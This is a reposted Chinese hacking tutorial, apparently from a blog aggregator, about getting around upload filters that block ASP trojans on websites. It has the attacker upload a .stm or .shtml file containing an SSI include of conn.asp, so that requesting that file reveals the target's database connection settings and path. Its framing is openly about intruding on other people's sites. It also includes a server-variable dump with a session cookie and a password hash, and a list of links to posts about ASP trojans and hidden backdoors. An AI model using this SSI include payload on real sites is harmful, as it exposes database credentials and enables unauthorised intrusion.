当网站不允许上传asp木马时的一个解决方法
来源:互联网 发布:社交网络平台 编辑:程序博客网 时间:2024/05/17 09:26
入侵的过程当中,大多离不开上传,当目标网站不允许上传ASP木马的时候我们该怎么办呢?
本文介绍了一个解决方法,希望能给你带来帮助。
将以下文件保存为stm或者shtml。
HTTP_ACCEPT:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* HTTP_ACCEPT_LANGUAGE:zh-cn HTTP_CONNECTION:Keep-Alive HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322) HTTP_COOKIE:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ HTTP_ACCEPT_ENCODING:gzip, deflate 当前文件名称:F:/Web/1.stm
Web服务器的名称和版本:Microsoft-IIS/5.0 主机名:localhost 端口:80 客户或客户代理IP地址:127.0.0.1 客户或客户代理主机名:127.0.0.1 PATH_INFO 的值,但带有扩展为某个目录规范的虚拟路径:F:/Web/1.stm 客户端给出附加路径信息:/1.stm image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!
如上所说的<!--#include file="conn.asp"-->就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.htm其中的内容。我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为: <!--#include file="ok.asp"--> 又在同一目录下放了一个我的一个木马文件ok.asp 在浏览器中请求test.stm,没有什么反映,一片空白。 但是一查看源代码,狂晕,原来就是我的asp文件的内容! 这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径, 但是一个前提是服务器的对stm或者shtml的扩展没有删除!
- 当网站不允许上传asp木马时的一个解决方法
- 当网站不允许上传asp cer cdx htr文件时的一个解决方法
- 当网站不允许上传asp cer cdx htr文件时的一个解决方法! Author: Neeao From:http://www.neeao.info
- 当网站不允许上传asp cer cdx htr文件时
- 当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时
- 当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时
- 网站不允许上传asp cer cdx htr等文件时
- 一个下载木马的网站
- 上传功能出现 asp 0104 不允许操作解决方法
- IIS的ASP木马怎么上传的
- 上传ASP木马
- ASP 上传文件时,发生了未处理的异常 007 asp 0104不允许操作
- 一个被挂木马的政府网站
- 一个网站木马的学习1
- 有自定义控件的网站项目发布时,“不允许循环文件引用”的错误”的解决方法
- 一个ASP木马
- ASP出现“不允许的父路径 ”的解决方法
- SQL注入与ASP木马上传的又一思路
- middlegen's usage
- 如何构造注入点文件
- String 和 StringBuilder的区别
- 偷偷告诉你:快乐的秘诀是什么
- 微笑面对生活,生活才回你以微笑
- 当网站不允许上传asp木马时的一个解决方法
- 隐藏ASP后门的三种方法
- 简易OA系统
- .NET反射、委托技术与设计模式(http://developer.51cto.com/art/200712/63137.htm)
- Adobe AIR: Create - Modify - Reuse
- 再见,我的大学
- 简易OA系统
- 神奇的 SqlBulkCopy
- 电子商务系统